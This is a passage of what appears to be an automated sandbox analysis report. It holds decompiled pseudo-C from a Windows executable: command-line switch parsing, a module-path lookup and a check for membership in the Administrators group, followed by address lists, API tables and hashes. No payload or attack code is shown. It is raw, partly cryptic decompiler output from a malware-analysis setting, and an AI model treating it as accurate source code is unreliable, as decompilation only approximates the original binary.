                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										goto L40;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									if(_t163 != 0) {
                                                                                                                                                                                                                                                										L40:
                                                                                                                                                                                                                                                										_t79 = _v268;
                                                                                                                                                                                                                                                										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                                											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                                											if(_t83 == 0) {
                                                                                                                                                                                                                                                												_t202 = 0x521;
                                                                                                                                                                                                                                                												E000544B9(0, 0x521, 0x51140, 0, 0x40, 0);
                                                                                                                                                                                                                                                												_t85 =  *0x58588; // 0x0
                                                                                                                                                                                                                                                												if(_t85 != 0) {
                                                                                                                                                                                                                                                													CloseHandle(_t85);
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												ExitProcess(0);
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t87 = _t83 - 4;
                                                                                                                                                                                                                                                											if(_t87 == 0) {
                                                                                                                                                                                                                                                												if(_v266 != 0) {
                                                                                                                                                                                                                                                													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                														goto L49;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                                														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                                														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                                														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                                														_t202 = _t50;
                                                                                                                                                                                                                                                														do {
                                                                                                                                                                                                                                                															_t88 =  *_t183;
                                                                                                                                                                                                                                                															_t183 = _t183 + 1;
                                                                                                                                                                                                                                                														} while (_t88 != 0);
                                                                                                                                                                                                                                                														if(_t183 == _t202) {
                                                                                                                                                                                                                                                															goto L49;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t205 = 0x5b;
                                                                                                                                                                                                                                                															if(E0005667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                                																L115:
                                                                                                                                                                                                                                                																_t206 = 0x5d;
                                                                                                                                                                                                                                                																if(E0005667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                                																	L117:
                                                                                                                                                                                                                                                																	_t202 =  &_v276;
                                                                                                                                                                                                                                                																	_v276 = _t167;
                                                                                                                                                                                                                                                																	if(E00055C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                                																		goto L49;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		_t202 = 0x104;
                                                                                                                                                                                                                                                																		E00051680(0x58c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	_t202 = 0x5b;
                                                                                                                                                                                                                                                																	if(E0005667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                                																		goto L49;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		goto L117;
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																_t202 = 0x5d;
                                                                                                                                                                                                                                                																if(E0005667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                                																	goto L49;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	goto L115;
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													 *0x58a24 = 1;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L50;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t100 = _t87 - 1;
                                                                                                                                                                                                                                                												if(_t100 == 0) {
                                                                                                                                                                                                                                                													L98:
                                                                                                                                                                                                                                                													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                														goto L49;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                                														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                                														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                                														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                                														_t202 = _t38;
                                                                                                                                                                                                                                                														do {
                                                                                                                                                                                                                                                															_t101 =  *_t192;
                                                                                                                                                                                                                                                															_t192 = _t192 + 1;
                                                                                                                                                                                                                                                														} while (_t101 != 0);
                                                                                                                                                                                                                                                														if(_t192 == _t202) {
                                                                                                                                                                                                                                                															goto L49;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t202 =  &_v276;
                                                                                                                                                                                                                                                															_v276 = _t170;
                                                                                                                                                                                                                                                															if(E00055C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                                																goto L49;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                                																_t218 = 0x58b3e;
                                                                                                                                                                                                                                                																_t105 = _v276;
                                                                                                                                                                                                                                                																if(_t104 != 0x54) {
                                                                                                                                                                                                                                                																	_t218 = 0x58a3a;
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                																E00051680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                                																_t202 = 0x104;
                                                                                                                                                                                                                                                																E0005658A(_t218, 0x104, 0x51140);
                                                                                                                                                                                                                                                																if(E000531E0(_t218) != 0) {
                                                                                                                                                                                                                                                																	goto L50;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	goto L106;
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                                													if(_t111 == 0) {
                                                                                                                                                                                                                                                														if(_v266 != 0) {
                                                                                                                                                                                                                                                															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                																goto L49;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																_t199 = _v265;
                                                                                                                                                                                                                                                																if(_t199 != 0) {
                                                                                                                                                                                                                                                																	_t219 =  &_v265;
                                                                                                                                                                                                                                                																	do {
                                                                                                                                                                                                                                                																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                                																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                                																		if(_t115 == 0) {
                                                                                                                                                                                                                                                																			 *0x58a2c = 1;
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			_t200 = 2;
                                                                                                                                                                                                                                                																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                                																			if(_t119 == 0) {
                                                                                                                                                                                                                                                																				 *0x58a30 = 1;
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                                																					 *0x58a34 = 1;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t209 = 0;
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																		_t118 =  *_t219;
                                                                                                                                                                                                                                                																		_t199 = _t118;
                                                                                                                                                                                                                                                																	} while (_t118 != 0);
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															 *0x58a2c = 1;
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                														goto L50;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														_t127 = _t111 - 3;
                                                                                                                                                                                                                                                														if(_t127 == 0) {
                                                                                                                                                                                                                                                															if(_v266 != 0) {
                                                                                                                                                                                                                                                																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                																	goto L49;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                                																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                                																		goto L76;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                                																			goto L83;
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                                																				goto L76;
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				goto L49;
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															} else {
													L76:
													_push(2);
													_pop(1);
													L83:
													*0x58a38 = 1;
												}
												goto L50;
											} else {
												_t132 = _t127 - 1;
												if(_t132 == 0) {
													if(_v266 != 0) {
														if(_v266 != 0x3a) {
															if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																goto L49;
															}
														} else {
															_t201 = _v265;
															*0x59a2c = 1;
															if(_t201 != 0) {
																_t220 =  &_v265;
																do {
																	_t220 = _t220 + 1;
																	_t142 = CharUpperA(_t201) - 0x41;
																	if(_t142 == 0) {
																		_t143 = 2;
																		*0x59a2c =  *0x59a2c | _t143;
																		goto L70;
																	} else {
																		_t145 = _t142 - 3;
																		if(_t145 == 0) {
																			*0x58d48 =  *0x58d48 | 0x00000040;
																		} else {
																			_t146 = _t145 - 5;
																			if(_t146 == 0) {
																				*0x59a2c =  *0x59a2c & 0xfffffffd;
																				goto L70;
																			} else {
																				_t147 = _t146 - 5;
																				if(_t147 == 0) {
																					*0x59a2c =  *0x59a2c & 0xfffffffe;
																					goto L70;
																				} else {
																					_t149 = _t147;
																					if(_t149 == 0) {
																						*0x58d48 =  *0x58d48 | 0x00000080;
																					} else {
																						if(_t149 == 3) {
																							*0x59a2c =  *0x59a2c | 0x00000004;
																							L70:
																							*0x58a28 = 1;
																						} else {
																							_t209 = 0;
																						}
																					}
																				}
																			}
																		}
																	}
																	_t144 =  *_t220;
																	_t201 = _t144;
																} while (_t144 != 0);
															}
														}
													} else {
														*0x59a2c = 3;
														*0x58a28 = 1;
													}
													goto L50;
												} else {
													if(_t132 == 0) {
														goto L98;
													} else {
														L49:
														_t209 = 0;
														L50:
														_t173 = _v272;
														if( *_t173 != 0) {
															goto L2;
														} else {
															break;
														}
													}
												}
											}
										}
									}
								}
							} else {
								goto L106;
							}
						} else {
							L34:
							_t209 = 0;
							break;
						}
					}
				}
			}
			goto L131;
		}
		if( *0x58a2c != 0 &&  *0x58b3e == 0) {
			if(GetModuleFileNameA( *0x59a3c, 0x58b3e, 0x104) == 0) {
				_t209 = 0;
			} else {
				_t202 = 0x5c;
				*((char*)(E000566C8(0x58b3e, _t202) + 1)) = 0;
			}
		}
		_t63 = _t209;
	}
	L131:
}

                                                                                                                                                                                                                                                0x00055d12
                                                                                                                                                                                                                                                0x00055d14
                                                                                                                                                                                                                                                0x00055d15
                                                                                                                                                                                                                                                0x00055d17
                                                                                                                                                                                                                                                0x00055d49
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d19
                                                                                                                                                                                                                                                0x00055d19
                                                                                                                                                                                                                                                0x00055d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d3f
                                                                                                                                                                                                                                                0x00055d3f
                                                                                                                                                                                                                                                0x00055d4b
                                                                                                                                                                                                                                                0x00055d4b
                                                                                                                                                                                                                                                0x00055d4f
                                                                                                                                                                                                                                                0x00055d8d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d93
                                                                                                                                                                                                                                                0x00055d93
                                                                                                                                                                                                                                                0x00055d9a
                                                                                                                                                                                                                                                0x00055d9d
                                                                                                                                                                                                                                                0x00055d9e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d9e
                                                                                                                                                                                                                                                0x00055d51
                                                                                                                                                                                                                                                0x00055d5b
                                                                                                                                                                                                                                                0x00055d72
                                                                                                                                                                                                                                                0x000560fb
                                                                                                                                                                                                                                                0x000560fb
                                                                                                                                                                                                                                                0x00056207
                                                                                                                                                                                                                                                0x0005620a
                                                                                                                                                                                                                                                0x0005620b
                                                                                                                                                                                                                                                0x0005620e
                                                                                                                                                                                                                                                0x00056217
                                                                                                                                                                                                                                                0x00055d78
                                                                                                                                                                                                                                                0x00055d78
                                                                                                                                                                                                                                                0x00055d80
                                                                                                                                                                                                                                                0x00055d83
                                                                                                                                                                                                                                                0x00055d84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d84
                                                                                                                                                                                                                                                0x00055d5d
                                                                                                                                                                                                                                                0x00055d5f
                                                                                                                                                                                                                                                0x00055d62
                                                                                                                                                                                                                                                0x00055d68
                                                                                                                                                                                                                                                0x00055d64
                                                                                                                                                                                                                                                0x00055d64
                                                                                                                                                                                                                                                0x00055d64
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d62
                                                                                                                                                                                                                                                0x00055d5b
                                                                                                                                                                                                                                                0x00055d4f
                                                                                                                                                                                                                                                0x00055d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d9f
                                                                                                                                                                                                                                                0x00055d9f
                                                                                                                                                                                                                                                0x00055da5
                                                                                                                                                                                                                                                0x00055dab
                                                                                                                                                                                                                                                0x00055dba
                                                                                                                                                                                                                                                0x00056218
                                                                                                                                                                                                                                                0x0005621d
                                                                                                                                                                                                                                                0x00056220
                                                                                                                                                                                                                                                0x00056221
                                                                                                                                                                                                                                                0x00056229
                                                                                                                                                                                                                                                0x00056230
                                                                                                                                                                                                                                                0x00056247
                                                                                                                                                                                                                                                0x0005626a
                                                                                                                                                                                                                                                0x00056272
                                                                                                                                                                                                                                                0x00056249
                                                                                                                                                                                                                                                0x00056255
                                                                                                                                                                                                                                                0x0005625f
                                                                                                                                                                                                                                                0x00056264
                                                                                                                                                                                                                                                0x00056264
                                                                                                                                                                                                                                                0x00056284
                                                                                                                                                                                                                                                0x00055dc0
                                                                                                                                                                                                                                                0x00055dc0
                                                                                                                                                                                                                                                0x00055dca
                                                                                                                                                                                                                                                0x00055e22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055dcc
                                                                                                                                                                                                                                                0x00055dce
                                                                                                                                                                                                                                                0x00055e24
                                                                                                                                                                                                                                                0x00055e24
                                                                                                                                                                                                                                                0x00055e2c
                                                                                                                                                                                                                                                0x00055e47
                                                                                                                                                                                                                                                0x00055e4a
                                                                                                                                                                                                                                                0x000561d2
                                                                                                                                                                                                                                                0x000561e2
                                                                                                                                                                                                                                                0x000561e7
                                                                                                                                                                                                                                                0x000561ee
                                                                                                                                                                                                                                                0x000561f1
                                                                                                                                                                                                                                                0x000561f1
                                                                                                                                                                                                                                                0x000561f8
                                                                                                                                                                                                                                                0x000561f8
                                                                                                                                                                                                                                                0x00055e50
                                                                                                                                                                                                                                                0x00055e53
                                                                                                                                                                                                                                                0x00056109
                                                                                                                                                                                                                                                0x0005611f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056125
                                                                                                                                                                                                                                                0x00056137
                                                                                                                                                                                                                                                0x0005613a
                                                                                                                                                                                                                                                0x0005613c
                                                                                                                                                                                                                                                0x0005613e
                                                                                                                                                                                                                                                0x0005613e
                                                                                                                                                                                                                                                0x00056141
                                                                                                                                                                                                                                                0x00055f8d
                                                                                                                                                                                                                                                0x00055f8f
                                                                                                                                                                                                                                                0x00055fc1
                                                                                                                                                                                                                                                0x00055fc1
                                                                                                                                                                                                                                                0x00055fc1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e74
                                                                                                                                                                                                                                                0x00055e74
                                                                                                                                                                                                                                                0x00055e77
                                                                                                                                                                                                                                                0x00055ea0
                                                                                                                                                                                                                                                0x00055ebd
                                                                                                                                                                                                                                                0x00055f79
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055f7f
                                                                                                                                                                                                                                                0x00055ec3
                                                                                                                                                                                                                                                0x00055ec3
                                                                                                                                                                                                                                                0x00055ecc
                                                                                                                                                                                                                                                0x00055ed4
                                                                                                                                                                                                                                                0x00055ed6
                                                                                                                                                                                                                                                0x00055edc
                                                                                                                                                                                                                                                0x00055edf
                                                                                                                                                                                                                                                0x00055eea
                                                                                                                                                                                                                                                0x00055eed
                                                                                                                                                                                                                                                0x00055f3f
                                                                                                                                                                                                                                                0x00055f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055eef
                                                                                                                                                                                                                                                0x00055eef
                                                                                                                                                                                                                                                0x00055ef2
                                                                                                                                                                                                                                                0x00055f34
                                                                                                                                                                                                                                                0x00055ef4
                                                                                                                                                                                                                                                0x00055ef4
                                                                                                                                                                                                                                                0x00055ef7
                                                                                                                                                                                                                                                0x00055f2b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055ef9
                                                                                                                                                                                                                                                0x00055ef9
                                                                                                                                                                                                                                                0x00055efc
                                                                                                                                                                                                                                                0x00055f22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055efe
                                                                                                                                                                                                                                                0x00055eff
                                                                                                                                                                                                                                                0x00055f02
                                                                                                                                                                                                                                                0x00055f16
                                                                                                                                                                                                                                                0x00055f04
                                                                                                                                                                                                                                                0x00055f07
                                                                                                                                                                                                                                                0x00055f0d
                                                                                                                                                                                                                                                0x00055f46
                                                                                                                                                                                                                                                0x00055f46
                                                                                                                                                                                                                                                0x00055f09
                                                                                                                                                                                                                                                0x00055f09
                                                                                                                                                                                                                                                0x00055f09
                                                                                                                                                                                                                                                0x00055f07
                                                                                                                                                                                                                                                0x00055f02
                                                                                                                                                                                                                                                0x00055efc
                                                                                                                                                                                                                                                0x00055ef7
                                                                                                                                                                                                                                                0x00055ef2
                                                                                                                                                                                                                                                0x00055f4c
                                                                                                                                                                                                                                                0x00055f4e
                                                                                                                                                                                                                                                0x00055f50
                                                                                                                                                                                                                                                0x00055f54
                                                                                                                                                                                                                                                0x00055ed4
                                                                                                                                                                                                                                                0x00055ea2
                                                                                                                                                                                                                                                0x00055ea4
                                                                                                                                                                                                                                                0x00055eaf
                                                                                                                                                                                                                                                0x00055eaf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e79
                                                                                                                                                                                                                                                0x00055e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e83
                                                                                                                                                                                                                                                0x00055e83
                                                                                                                                                                                                                                                0x00055e83
                                                                                                                                                                                                                                                0x00055e85
                                                                                                                                                                                                                                                0x00055e85
                                                                                                                                                                                                                                                0x00055e8e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e94
                                                                                                                                                                                                                                                0x00055e8e
                                                                                                                                                                                                                                                0x00055e7d
                                                                                                                                                                                                                                                0x00055e77
                                                                                                                                                                                                                                                0x00055e6e
                                                                                                                                                                                                                                                0x00055e65
                                                                                                                                                                                                                                                0x00055e5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055dd0
                                                                                                                                                                                                                                                0x00055dd0
                                                                                                                                                                                                                                                0x00055dd0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055dd0
                                                                                                                                                                                                                                                0x00055dce
                                                                                                                                                                                                                                                0x00055dca
                                                                                                                                                                                                                                                0x00055dba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d00
                                                                                                                                                                                                                                                0x00055dd9
                                                                                                                                                                                                                                                0x00055e04
                                                                                                                                                                                                                                                0x000561fe
                                                                                                                                                                                                                                                0x00055e0a
                                                                                                                                                                                                                                                0x00055e0c
                                                                                                                                                                                                                                                0x00055e17
                                                                                                                                                                                                                                                0x00055e17
                                                                                                                                                                                                                                                0x00055e04
                                                                                                                                                                                                                                                0x00056200
                                                                                                                                                                                                                                                0x00056200
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharNextA.USER32(?,00000000,?,?), ref: 00055CEE
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00058B3E,00000104,00000000,?,?), ref: 00055DFC
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00055E3E
                                                                                                                                                                                                                                                • CharUpperA.USER32(-00000052), ref: 00055EE1
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00055F6F
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00055FA7
                                                                                                                                                                                                                                                • CharUpperA.USER32(-0000004E), ref: 00056008
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 000560AA
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00051140,00000000,00000040,00000000), ref: 000561F1
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 000561F8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                                • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                                • Opcode ID: a2b7c4a682b7cb4ce2ecb42cdffb47802d966845ffd113adc3e8bd4769b197d0
                                                                                                                                                                                                                                                • Instruction ID: 947026c79e9573314feb681f274824a8853bf2be7f625ff98c28222136cd7766
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2b7c4a682b7cb4ce2ecb42cdffb47802d966845ffd113adc3e8bd4769b197d0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFD17831A04E445EEFB58B388C693FB3BF5AB16303F5441A9CC86D7191DA758E8E8B11
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                                                                                                                			E000518A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				short _v12;
                                                                                                                                                                                                                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                                				long _v24;
                                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                                				void* _v32;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                                                				long _t45;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				int _t50;
                                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t51 = __esi;
                                                                                                                                                                                                                                                				_t49 = __edx;
                                                                                                                                                                                                                                                				_t23 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                                				_t25 =  *0x58128; // 0x2
                                                                                                                                                                                                                                                				_t45 = 0;
                                                                                                                                                                                                                                                				_v12 = 0x500;
                                                                                                                                                                                                                                                				_t50 = 2;
                                                                                                                                                                                                                                                				_v16.Value = 0;
                                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                                				if(_t25 != _t50) {
                                                                                                                                                                                                                                                					L20:
                                                                                                                                                                                                                                                					return E00056CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(E000517EE( &_v20) != 0) {
                                                                                                                                                                                                                                                					_t25 = _v20;
                                                                                                                                                                                                                                                					if(_v20 != 0) {
                                                                                                                                                                                                                                                						 *0x58128 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				/* Desired access 8 = TOKEN_QUERY on the current process token. */
                                                                                                                                                                                                                                                				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				}
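                                                                                                                                                                                                                                                				/* Size probe: information class _t50 = 2 is TokenGroups; the call is expected to fail with 0x7a (ERROR_INSUFFICIENT_BUFFER) and return the required size in _v24. */
                                                                                                                                                                                                                                                				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {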
                                                                                                                                                                                                                                                					L17:
                                                                                                                                                                                                                                                					CloseHandle(_v28);
                                                                                                                                                                                                                                                					_t25 = _v20;
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_push(__esi);
                                                                                                                                                                                                                                                					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                                					if(_t52 == 0) {
                                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                                						_pop(_t51);
                                                                                                                                                                                                                                                						goto L17;
                                                                                                                                                                                                                                                					}
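                                                                                                                                                                                                                                                					/* Reads the token's group list, then builds a SID with two sub-authorities: 0x20 (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS). */
                                                                                                                                                                                                                                                					/* _v16 together with _v12 = 0x500 forms the identifier authority {0,0,0,0,0,5} (SECURITY_NT_AUTHORITY), so the SID is S-1-5-32-544, the built-in Administrators group. */
                                                                                                                                                                                                                                                					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {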
                                                                                                                                                                                                                                                						L15:
                                                                                                                                                                                                                                                						LocalFree(_t52);
                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if( *_t52 <= 0) {
                                                                                                                                                                                                                                                							L14:
                                                                                                                                                                                                                                                							FreeSid(_v32);
                                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                                						_t50 = _t15;
                                                                                                                                                                                                                                                						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                                							_t45 = _t45 + 1;
                                                                                                                                                                                                                                                							_t50 = _t50 + 8;
                                                                                                                                                                                                                                                							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *0x58128 = 1;
                                                                                                                                                                                                                                                						_v20 = 1;
                                                                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                0x000519ad
                                                                                                                                                                                                                                                0x000519b3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051927
                                                                                                                                                                                                                                                0x00051927
                                                                                                                                                                                                                                                0x00051932
                                                                                                                                                                                                                                                0x00051936
                                                                                                                                                                                                                                                0x000519a9
                                                                                                                                                                                                                                                0x000519a9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000519a9
                                                                                                                                                                                                                                                0x0005194c
                                                                                                                                                                                                                                                0x000519a2
                                                                                                                                                                                                                                                0x000519a3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005196e
                                                                                                                                                                                                                                                0x00051970
                                                                                                                                                                                                                                                0x00051999
                                                                                                                                                                                                                                                0x0005199c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005199c
                                                                                                                                                                                                                                                0x00051972
                                                                                                                                                                                                                                                0x00051972
                                                                                                                                                                                                                                                0x00051975
